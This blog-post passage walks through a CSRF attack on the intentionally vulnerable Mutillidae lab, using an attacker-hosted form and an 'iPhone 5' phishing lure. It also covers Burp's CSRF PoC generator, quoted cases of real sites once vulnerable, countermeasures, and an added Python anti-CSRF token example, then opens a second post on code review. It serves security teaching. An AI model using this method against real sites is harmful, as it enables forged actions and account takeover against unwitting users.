<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhppf-dDSNexwl4P4QnICFZN7fFbdo9Mj8qIQQ9YR6FBje3j9uDt3kFqbBsdIoVIa55bxGBYhl6UaBav7olU3z9A2opZRHM1BtBrFVU3OppgI6kAvKx1o_0nUZc4kDVpCEPoi6Q2rbgVlM/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhppf-dDSNexwl4P4QnICFZN7fFbdo9Mj8qIQQ9YR6FBje3j9uDt3kFqbBsdIoVIa55bxGBYhl6UaBav7olU3z9A2opZRHM1BtBrFVU3OppgI6kAvKx1o_0nUZc4kDVpCEPoi6Q2rbgVlM/s1600/2.png" width="640" /></a></div>
<b><br /></b>
<br />
<div class="p1">
If we view the source of the "Register Account" page, we can identify the form (and therefore the POST request) that is sent to the web application. That data is then processed by the application and the user is created.</div>
<div class="p1">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbQKEccJwslBbsMgCLpZvLoM5ot_9ZRSTBxxCeWxVG7PkwZZJJAKS8NBNI9UfpeCVfTGpVSHLUv37_oFfv0vfn9lyTK2KVyh04_xNErVEgau_WCqA4K_5xEKpTyrwRRCs1Y5736tlq4s/s1600/source.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgbQKEccJwslBbsMgCLpZvLoM5ot_9ZRSTBxxCeWxVG7PkwZZJJAKS8NBNI9UfpeCVfTGpVSHLUv37_oFfv0vfn9lyTK2KVyh04_xNErVEgau_WCqA4K_5xEKpTyrwRRCs1Y5736tlq4s/s1600/source.png" width="544" /></a></div>
<div class="p1">
<br /></div>
Now, the attacker can create his own form on his web server and populate the HTML fields with the data of the user he wants to create on the system. (Note: no coding expertise is needed in order to create this HTML page!) In the following picture you can see the HTML page that he creates on his web server. He creates a user named "andrew", with password "qwerty".<br />
<div class="p1">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqpDYnsWCVVGbvpJXLfn7-NHijfLJ0Jih4QZzOEpBIWHvpE3u9Mina8q-vYpNdG7msPeh0gWvtAKRsZIXYlNl8Qfi6kAyXQEZaQtW3RaQdm6Jdej9JmBhNZ4ze20DxKDYv6dIhvnzmeSo/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqpDYnsWCVVGbvpJXLfn7-NHijfLJ0Jih4QZzOEpBIWHvpE3u9Mina8q-vYpNdG7msPeh0gWvtAKRsZIXYlNl8Qfi6kAyXQEZaQtW3RaQdm6Jdej9JmBhNZ4ze20DxKDYv6dIhvnzmeSo/s1600/7.png" width="640" /></a></div>
<br /></div>
Now he launches the web server (192.168.200.14) hosting this page. At this point, he needs the user's interaction. This could be accomplished, for example, by a phishing attack scenario: the victim receives an email inviting the victim to visit the attacker's page saying "click here to win an iPhone 5", or he could put this "iPhone 5" message on the page he created!<br />
<div class="p2">
<br /></div>
<div class="p2">
Just imagine:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_eV_CsRIAiI0PEj9uAotccCZuIh1vktOQgEsjEG1-wFbhgT32C8XoncTBx9BaQ5QgZ5JBzhtKsP1z2llh5ps_M56HXfE1VryAafWoNRm3j_TDbj-L3KDAPgrpXq8CameOH9VnYk5IQmo/s1600/iphone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_eV_CsRIAiI0PEj9uAotccCZuIh1vktOQgEsjEG1-wFbhgT32C8XoncTBx9BaQ5QgZ5JBzhtKsP1z2llh5ps_M56HXfE1VryAafWoNRm3j_TDbj-L3KDAPgrpXq8CameOH9VnYk5IQmo/s1600/iphone.png" width="640" /></a></div>
<b><br /></b>
<br />
And this is how it will appear on the victim's web browser:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNVc_tK_BhbCD8Sw0FF31a6OQB6vzoAUt3Si2tilpVg6qWxBV4XGnzxzelPeZ4FKd0SSxXZKahARPIpqiSbcQ1QJga6bab6EzVbzy_uB_bL7WnMCoKTVlUMGkWU01jY51yfgtlKZ2dVvk/s1600/iphone2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNVc_tK_BhbCD8Sw0FF31a6OQB6vzoAUt3Si2tilpVg6qWxBV4XGnzxzelPeZ4FKd0SSxXZKahARPIpqiSbcQ1QJga6bab6EzVbzy_uB_bL7WnMCoKTVlUMGkWU01jY51yfgtlKZ2dVvk/s1600/iphone2.png" width="640" /></a></div>
<br />
The victim, who is at the same time logged in with his account at the Mutillidae web application, is now tricked into clicking the button and submitting a register-user form with the username and password set by the attacker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqqIJ532Q_mEo-mnbKVGljtAcrtavTg2PjdzLReza8K4V5M7ER6DDeIFxIX5J6R3qvVmgr5IJgAFF7KTQC7HcwVo8OaGo6wpxXOqVfMbnsZd5mF0z9bQ18eFi6gAw6A3KMakjkSimqF1A/s1600/12csrf_successful.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqqIJ532Q_mEo-mnbKVGljtAcrtavTg2PjdzLReza8K4V5M7ER6DDeIFxIX5J6R3qvVmgr5IJgAFF7KTQC7HcwVo8OaGo6wpxXOqVfMbnsZd5mF0z9bQ18eFi6gAw6A3KMakjkSimqF1A/s1600/12csrf_successful.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9udeFEmuXvGWrPCQAeTZ5OAtf_oblRY4B-A70u-mpDhDeq6Kbb5eieve4Jj06GZS0LO_wgTljQVxgTjHvwrrETQF5ROPWNVoQK4moosMD68cbooQSfJjl2ZU0GP2ILmpWI8mpjI_XToU/s1600/13logs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="374" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9udeFEmuXvGWrPCQAeTZ5OAtf_oblRY4B-A70u-mpDhDeq6Kbb5eieve4Jj06GZS0LO_wgTljQVxgTjHvwrrETQF5ROPWNVoQK4moosMD68cbooQSfJjl2ZU0GP2ILmpWI8mpjI_XToU/s1600/13logs.png" width="640" /></a></div>
Now user "andrew" can log in with the password set during the CSRF request.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegfmiPgwc1NTgeJ85T76uHEbl4zJ_pnn9Z4UzCzaZM2LseJArZjsxUfr4iyCmNT0hUGQY43T64KgUQh2g6vep7TLqom1GTUlfDt3sZS2ZOh-SeK8zaUcVvIqCUolQ7p9eAZMOwwW8DTE/s1600/andrewLogsin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgegfmiPgwc1NTgeJ85T76uHEbl4zJ_pnn9Z4UzCzaZM2LseJArZjsxUfr4iyCmNT0hUGQY43T64KgUQh2g6vep7TLqom1GTUlfDt3sZS2ZOh-SeK8zaUcVvIqCUolQ7p9eAZMOwwW8DTE/s1600/andrewLogsin.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMusae96yGMLmk2ks36_cpF2qpgVJL2DOQJZiusAcAGobLFn0t3H_00fKJ5TJtbwGurV5YDKpJlGnOhibAlTz-t-5_bDcT6pawrCBHO3fPvKqmf5jjonzpPNGbc0YBFEDZeQfCuDoRyGg/s1600/andrewLogsin2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMusae96yGMLmk2ks36_cpF2qpgVJL2DOQJZiusAcAGobLFn0t3H_00fKJ5TJtbwGurV5YDKpJlGnOhibAlTz-t-5_bDcT6pawrCBHO3fPvKqmf5jjonzpPNGbc0YBFEDZeQfCuDoRyGg/s1600/andrewLogsin2.png" width="640" /></a></div>
<br />
At this point the CSRF attack scenario is complete. We successfully managed to exploit a CSRF vulnerability and add a user to the vulnerable web application.<br />
<br />
<b>The CASE studies for CSRF</b><br />
<b><br /></b>
The article <a href="https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/" target="_blank">here</a> lists many popular web sites that were vulnerable to CSRF attacks. An interesting extract from the article follows:<br />
<br />
"<b style="color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">1. ING Direct</b><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;"> </span><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">(</span><a href="http://www.ingdirect.com/" style="color: #195a8c; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; text-decoration: initial;">ingdirect.com</a><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">)</span><br />
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<i>Status: Fixed</i></div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
We found a vulnerability on ING’s website that allowed additional accounts to be created on behalf of an arbitrary user. We were also able to transfer funds out of users’ bank accounts. We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution. Specific details are described in our paper.</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<b>2. YouTube</b> (<a href="http://www.youtube.com/" style="color: #195a8c; text-decoration: initial;">youtube.com</a>)</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<i>Status: Fixed</i></div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
We discovered CSRF vulnerabilities in nearly every action a user could perform on YouTube. An attacker could have added videos to a user’s "Favorites," added himself to a user’s "Friend" or "Family" list, sent arbitrary messages on the user’s behalf, flagged videos as inappropriate, automatically shared a video with a user’s contacts, subscribed a user to a "channel" (a set of videos published by one person or group) and added videos to a user’s "QuickList" (a list of videos a user intends to watch at a later point). Specific details are described in our paper.</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<b>3. MetaFilter</b> (<a href="http://www.metafilter.com/" style="color: #195a8c; text-decoration: initial;">metafilter.com</a>)</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<i>Status: Fixed</i></div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
A vulnerability existed on Metafilter that allowed an attacker to take control of a user’s account. A forged request could be used to set a user’s email address to the attacker’s address. A second forged request could then be used to activate the "Forgot Password" action, which would send the user’s password to the attacker’s email address. Specific details are described in our paper.</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
(MetaFilter fixed this vulnerability in less than two days. We appreciate the fact that MetaFilter contacted us to let us know the problem had been fixed.)</div>
<div style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px; padding: 0px 0px 10px;">
<b>4. The New York Times</b> (<a href="http://www.nytimes.com/" style="color: #195a8c; text-decoration: initial;">nytimes.com</a>)</div>
<i style="color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">Status: Not Fixed. We contacted the New York Times in September, <b>2007</b>. <s>As of September 24, <b>2008</b>, this vulnerability still exists. </s></i><span style="background-color: white; color: #333333; font-family: Arial, Tahoma, Verdana; font-size: 12px; line-height: 20px;">This problem has been fixed.</span>"<br />
<b><br /></b>
<b>Note: </b>You can see from the above extract that CSRF issues are very common these days.<br />
<br />
<b>Tools for CSRFing the Web</b><br />
<br />
The Burp Proxy tool (the Pro version of course) can be used to generate a proof-of-concept (PoC) cross-site request forgery (CSRF) attack for a given request. To access this function, select a URL or HTTP request anywhere within Burp and choose "Generate CSRF PoC" under "Engagement tools" in the context menu.<br />
<br />
When you execute this function, Burp shows the full request you selected in the top panel and the generated CSRF HTML in the lower panel. The HTML uses a form with a suitable action URL, encoding type and parameters to generate the required request when the browser submits the form. You can edit the request manually and click the "Regenerate" button to regenerate the CSRF HTML based on the updated request.<br />
<br />
You can test the effectiveness of the generated PoC in your browser using the "Test in browser" button. When you select this option, Burp gives you a unique URL that you can paste into your browser (configured to use the current instance of Burp as its proxy). The resulting browser request is served by Burp with the currently displayed HTML, and you can then determine whether the PoC is effective by monitoring the resulting request(s) that are made through the Proxy. Some points should be noted regarding form encoding:<br />
<br />
• Some requests (e.g. those containing raw XML or JSON) have bodies that can only be generated using a form with plain text encoding. With each type of form submission using the POST method, the browser will include a Content-Type header indicating the encoding type of the form that generated the request. In some cases, although the message body exactly matches that required for the attack request, the application may reject the request due to an unexpected Content-Type header. Such CSRF-like conditions might not be practically exploitable. Burp will display a warning in the CSRF PoC generator if this is liable to occur.<br />
<br />
• If you manually select a form encoding type that cannot be used to produce the required request, Burp will generate a best effort at a PoC and will display a warning.<br />
<br />
• If the CSRF PoC generator is using plain text encoding, then the request body must contain an equals character in order for Burp to generate an HTML form which results in that exact body. If the original request does not contain an equals character, then you may be able to introduce one into a suitable position in the request, without affecting the server's processing of it.<br />
<br />
<b>CSRF PoC Options</b><br />
<br />
The following options are available:<br />
<br />
• Include auto-submit script - Using this option causes Burp to include a small script in the HTML that causes a JavaScript-enabled browser to automatically submit the form (causing the CSRF request) when the page is loaded.<br />
<br />
• Form encoding - This option lets you specify the type of encoding to use in the form that generates the CSRF request. The "Auto" option is generally preferred, and causes Burp to select the most appropriate encoding capable of generating the required request.<br />
<br />
The following picture shows a screenshot of the Burp CSRF PoC tool, reached by right-clicking an intercepted request:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYhhx8-AwxYoY95SFJBCPAKessvw24NO5GvQNGKi2cVQnjLcpwokxjLntya0zmUG2mZB_aMwcwRxF5TkRz66NzSqbOxJKBGR0fVNtpsNYIzsTeWMp336FO9YdtaJwN0U8LCsw8WS8V-o/s1600/burp+csrf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="535" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMYhhx8-AwxYoY95SFJBCPAKessvw24NO5GvQNGKi2cVQnjLcpwokxjLntya0zmUG2mZB_aMwcwRxF5TkRz66NzSqbOxJKBGR0fVNtpsNYIzsTeWMp336FO9YdtaJwN0U8LCsw8WS8V-o/s1600/burp+csrf1.png" width="640" /></a></div>
<br />
The following picture shows the generated CSRF PoC:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZgvSrBDAc7BAtthNNsnMZ83smVNRnulCaZEGgP6KVhAb65DNgoiae0pOgOOjaAoxln8ePEBwEvTelh1RYjt22EhKRK7pFMfiyVEJDDB2fVMzE7gf9zE_ZRMrmasTA7IaLteC8rSLo6r4/s1600/csrfgen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZgvSrBDAc7BAtthNNsnMZ83smVNRnulCaZEGgP6KVhAb65DNgoiae0pOgOOjaAoxln8ePEBwEvTelh1RYjt22EhKRK7pFMfiyVEJDDB2fVMzE7gf9zE_ZRMrmasTA7IaLteC8rSLo6r4/s1600/csrfgen.png" width="640" /></a></div>
<br />
<b>Note: </b>Right-click the intercepted HTTP GET or POST request and click "Generate CSRF PoC". Whether the request is a GET or a POST makes no difference if the web application accepts the two methods interchangeably, for obvious reasons.<br />
<b><br /></b>
<br />
<b>Prevention Measures That Do NOT Work</b><br />
<b><br /></b>
<u>Using a Secret Cookie:</u><br />
<br />
Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.<br />
<br />
<u>Only Accepting POST Requests:</u><br />
<br />
Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.<br />
<br />
<u>Multi-Step Transactions:</u><br />
<br />
Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.<br />
<br />
<u>URL Rewriting:</u><br />
<br />
This might be seen as a useful CSRF prevention technique, as the attacker cannot guess the victim's session ID. However, the user's credential (the session ID) is exposed in the URL.<br />
<b><br /></b>
<b>CSRF countermeasures </b><br />
<br />
CSRF attacks are very hard to trace and are probably not traceable unless one or more of the following conditions are met:<br />
<ol>
<li>Detailed Web Application user auditing exists and is enabled.</li>
<li>Concurrent logins are not allowed (allowing concurrent logins would remove non-repudiation).</li>
<li>The Web Application binds the Web Application session with the user IP (that way if the user is behind a NAT only users from the same intranet would be able to perform a CSRF attack).</li>
<li>Anti-CSRF tokens are used per Web Application function. In order to be effective, an anti-CSRF token would have to:
<ul>
<li>Be truly random.</li>
<li>Be bound to every Web Application function (a different token per Web Application function).</li>
<li>Behave like a session (e.g. expire after a certain time etc.).</li>
<li>Use two-factor authentication per token (e.g. make use of an RSA token to generate the anti-CSRF token needed to perform a transaction).</li>
</ul>
</li>
</ol>
<div>
<b>Other technologies for protecting against CSRF</b></div>
<div>
<b><br /></b></div>
<div>
<div class="p1">
In the web there are numerous references regarding the implementation of anti-CSRF tokens. Some examples can be found here: </div>
</div>
<ul class="ul1">
<li class="li1">Using View State to prevent CSRF attacks (example <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Viewstate_.28ASP.NET.29"><span class="s1">here</span></a>)</li>
<li class="li2"><a href="https://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project">OWASP CSRFGuard Project</a><span class="s2"> for Java</span></li>
<li class="li2"><a href="https://www.owasp.org/index.php/PHP_CSRF_Guard">PHP CSRF Guard</a><span class="s2"> </span></li>
<li class="li2"><a href="https://www.owasp.org/index.php/.Net_CSRF_Guard">.Net CSRF Guard</a></li>
<li class="li3">Anti CSRF for <a href="http://docs.joomla.org/How_to_add_CSRF_anti-spoofing_to_forms"><span class="s1">Joomla!</span></a></li>
</ul>
<div>
The mentality promoted by the above technologies is obvious: we should deploy a mechanism that makes every session initiated by the user unique. This can be achieved by sending the browser an anti-CSRF token that is appended to every request the browser sends to the server. The technique is explained in more technical terms in <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet"><span class="s1">OWASP's CSRF Prevention cheat sheet</span></a>:</div>
<div class="p2">
<br /></div>
<div class="p1">
"<i>These challenge tokens are the inserted within the HTML forms and links associated with sensitive server-side operations. When the user wishes to invoke these sensitive operations, the HTTP request should include this challenge token. It is then the responsibility of the server application to verify the existence and correctness of this token. By including a challenge token with each request, the developer has a strong control to verify that the user actually intended to submit the desired requests. Inclusion of a required security token in HTTP requests associated with sensitive business functions helps mitigate CSRF attacks as successful exploitation assumes the attacker knows the randomly generated token for the target victim's session. This is analogous to the attacker being able to guess the target victim's session identifier.</i>"</div>
<div>
<br /></div>
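The token properties listed under "CSRF countermeasures" above and the OWASP challenge-token description just quoted, implemented as an added example in Python (not code from this post, from OWASP or from the CSRF Guard projects): an HMAC-based token that is random, bound to one session and one application function, and expires like a session, plus a constructed register-user handler showing that the session cookie alone, which the browser attaches to every request, cannot prove the user's intent. The function names, the PHPSESSID cookie name and the session ids are assumptions made for the illustration.

```python
"""Added example, not code from the Elusive Thoughts post or from OWASP.

Implements the anti-CSRF token properties listed in the post (truly random,
bound to one application function, expiring like a session) as an HMAC-based
token, and shows why the "secret cookie" alone cannot prove the user's intent.
Every name below (issue_token, verify_token, handle_register, the PHPSESSID
cookie, the session ids) is constructed for this illustration.
"""
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Constructed server-side key: a real deployment loads it from a secret store.
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_TTL_SECONDS = 900  # a token lives 15 minutes, then "expires like a session"


def _mac(session_id: str, function: str, nonce: str, expires: int) -> str:
    """Keyed MAC over everything the token is bound to."""
    msg = f"{session_id}|{function}|{nonce}|{expires}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_token(session_id: str, function: str, now: Optional[float] = None) -> str:
    """Issue a token for ONE session and ONE application function.

    Format: <random nonce>.<expiry epoch>.<hmac>. The server embeds it as a
    hidden field of its own form; a cross-site form cannot know it.
    """
    now = time.time() if now is None else now
    nonce = secrets.token_hex(16)            # truly random part
    expires = int(now) + TOKEN_TTL_SECONDS   # behaves like a session: it expires
    return f"{nonce}.{expires}.{_mac(session_id, function, nonce, expires)}"


def verify_token(token: str, session_id: str, function: str,
                 now: Optional[float] = None) -> bool:
    """Accept only an unexpired token bound to this session AND this function."""
    now = time.time() if now is None else now
    try:
        nonce, expires_s, mac = token.split(".")
        expires = int(expires_s)
    except ValueError:          # malformed or missing token
        return False
    if now > expires:
        return False
    expected = _mac(session_id, function, nonce, expires)
    return hmac.compare_digest(mac, expected)  # constant-time comparison


def handle_register(request: dict, sessions: dict) -> str:
    """Constructed 'register user' handler.

    The session cookie is sent by the browser on every request, forged or not,
    so it only identifies the session; the per-function token is what shows
    the user actually submitted the application's own form.
    """
    session_id = request.get("cookies", {}).get("PHPSESSID")
    if session_id not in sessions:
        return "401 not logged in"
    form = request.get("form", {})
    if not verify_token(form.get("csrf_token", ""), session_id, "register-user"):
        return "403 rejected: missing or invalid anti-CSRF token"
    sessions[session_id]["users"].append((form.get("username"), form.get("password")))
    return "200 user created"


if __name__ == "__main__":
    sessions = {"sess-victim": {"users": []}}   # constructed logged-in session
    cookie = {"PHPSESSID": "sess-victim"}

    # 1. Cross-site form: the browser attaches the cookie, but the form carries
    #    no token, so the request is refused.
    forged = {"cookies": cookie, "form": {"username": "andrew", "password": "qwerty"}}
    print("forged request  ->", handle_register(forged, sessions))

    # 2. The application's own form, rendered with a token for this function.
    token = issue_token("sess-victim", "register-user")
    legit = {"cookies": cookie,
             "form": {"username": "andrew", "password": "qwerty", "csrf_token": token}}
    print("legit request   ->", handle_register(legit, sessions))

    # 3. A genuine token fails the check when used for another function, for
    #    another session, or after it has expired.
    print("other function  ->", verify_token(token, "sess-victim", "transfer-funds"))
    print("other session   ->", verify_token(token, "sess-other", "register-user"))
    print("expired         ->", verify_token(token, "sess-victim", "register-user",
                                             now=time.time() + TOKEN_TTL_SECONDS + 1))
```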
<b>Epilogue</b><br />
<br />
This blog post attempted to cover the subject of CSRF thoroughly, and I believe that I managed to do that. There are obviously a lot more things to say about how to protect against CSRF, but they are out of scope for the purposes of this post. Merry Christmas and a Happy New Year. <br />
<br />
<b>References:</b><br />
<ol>
<li><a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)">https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)</a></li>
<li><a href="http://en.wikipedia.org/wiki/Cross-site_request_forgery">http://en.wikipedia.org/wiki/Cross-site_request_forgery</a></li>
<li><a href="https://www.owasp.org/index.php/Testing_for_Exposed_Session_Variables_(OWASP-SM-004)">https://www.owasp.org/index.php/Testing_for_Exposed_Session_Variables_(OWASP-SM-004)</a></li>
<li><a href="http://haacked.com/archive/2009/04/02/anatomy-of-csrf-attack.aspx">http://haacked.com/archive/2009/04/02/anatomy-of-csrf-attack.aspx</a></li>
<li><a href="https://www.owasp.org/index.php/Session_fixation">https://www.owasp.org/index.php/Session_fixation</a></li>
<li><a href="http://ajaxian.com/archives/gmail-csrf-security-flaw">http://ajaxian.com/archives/gmail-csrf-security-flaw</a></li>
<li><a href="http://www.portswigger.net/burp/help/suite_functions_csrfpoc.html">http://www.portswigger.net/burp/help/suite_functions_csrfpoc.html</a> </li>
<li><a href="https://nealpoole.com/blog/2012/03/csrf-clickjacking-and-the-role-of-x-frame-options/">https://nealpoole.com/blog/2012/03/csrf-clickjacking-and-the-role-of-x-frame-options/</a></li>
<li><a href="http://fragilesecurity.blogspot.gr/2012/11/cross-site-request-forgery-legitimazing.html">http://fragilesecurity.blogspot.gr/2012/11/cross-site-request-forgery-legitimazing.html</a></li>
<li><a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet">https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet</a></li>
<li><a href="https://blogs.apache.org/infra/entry/apache_org_04_09_2010">https://blogs.apache.org/infra/entry/apache_org_04_09_2010</a></li>
<li><a href="https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/">https://freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks/</a></li>
<li><a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Viewstate_.28ASP.NET.29">https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Viewstate_.28ASP.NET.29</a></li>
<li><a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>
<b>The Da Vinci Cod(e) Review</b> (published 2012-11-06, updated 2012-12-08)<br />
<br />
<b>Introduction</b><br />
<b><br /></b>
This article is going to talk about performing Web Application security code reviews the proper way (also known as my way). The best approach to performing a Web Application security code review is to have at your disposal both the Web Application (uploaded and running in a Web Server) and of course the Web Application code itself, because you are then able to verify your findings in real time (e.g. exploit a Cross Site Scripting issue immediately after you identify it in the code).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQyNgx9F7Vsar2tIgqooNFHwRhcdMDbZlIGCHXvEsv822YzmlDUacYNSzKZCaQbpto-5Ympu0I2VRIrFnGzYI8F227J_wYy4vqniiG-juMI9NVnQRFytJ6MByxJkRRLLCeERXMTT7n4M/s1600/cod.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQyNgx9F7Vsar2tIgqooNFHwRhcdMDbZlIGCHXvEsv822YzmlDUacYNSzKZCaQbpto-5Ympu0I2VRIrFnGzYI8F227J_wYy4vqniiG-juMI9NVnQRFytJ6MByxJkRRLLCeERXMTT7n4M/s1600/cod.jpeg" height="320" width="320" /></a></div>
<br />
But first, let's define what a security source code review is. A security code review is a systematic examination of a Web Application's source code that is intended to find and fix security mistakes overlooked in the initial development phase, improving the overall security of the software. Reviews are done in various forms such as pair programming, informal walkthroughs, and formal inspections. They are often done by independent contractors or an internal security team; hiring an independent third party to perform the code review adds value because it gives the company the chance to have its code examined by a person who is engaged only at the last stage of the development process and has no <i>"emotional attachments to the code"</i>, and therefore has a unique perspective on the subject.<br />
<br />
<b>Types of code review</b><br />
<br />
Code review practices fall into three main categories: 1) pair programming, 2) formal code review and 3) lightweight code review. Formal code review, such as a Fagan inspection, involves a careful and detailed process with multiple participants and multiple phases. Formal code reviews are the traditional method of review, in which software developers attend a series of meetings and review code line by line, usually using printed copies of the material. Formal inspections are extremely thorough and have been proven effective at finding defects in the code under review. Lightweight code review typically requires less overhead than formal code inspections, though it can be equally effective when done properly.<br />
<br />
Lightweight reviews are often conducted as part of the normal development process:<br />
<ol>
<li>Over-the-shoulder – One developer looks over the author's shoulder as the latter walks through the code.</li>
<li>Email pass-around – Source code management system emails code to reviewers automatically after checkin is made.</li>
<li>Pair Programming – Two authors develop code together at the same workstation, as is common in Extreme Programming.</li>
<li>Tool-assisted code review – Authors and reviewers use specialized tools designed for peer code review.</li>
</ol>
<b>Important note:</b> Tools can be used to perform this task but they always need human verification. Tools do not understand context, which is the keystone of security code review. Tools are good at assessing large <u>amounts of code and pointing out possible issues but a person needs to verify every single result to determine if it is a real issue, if it is actually exploitable, and calculate the risk to the enterprise</u>. <br />
<br />
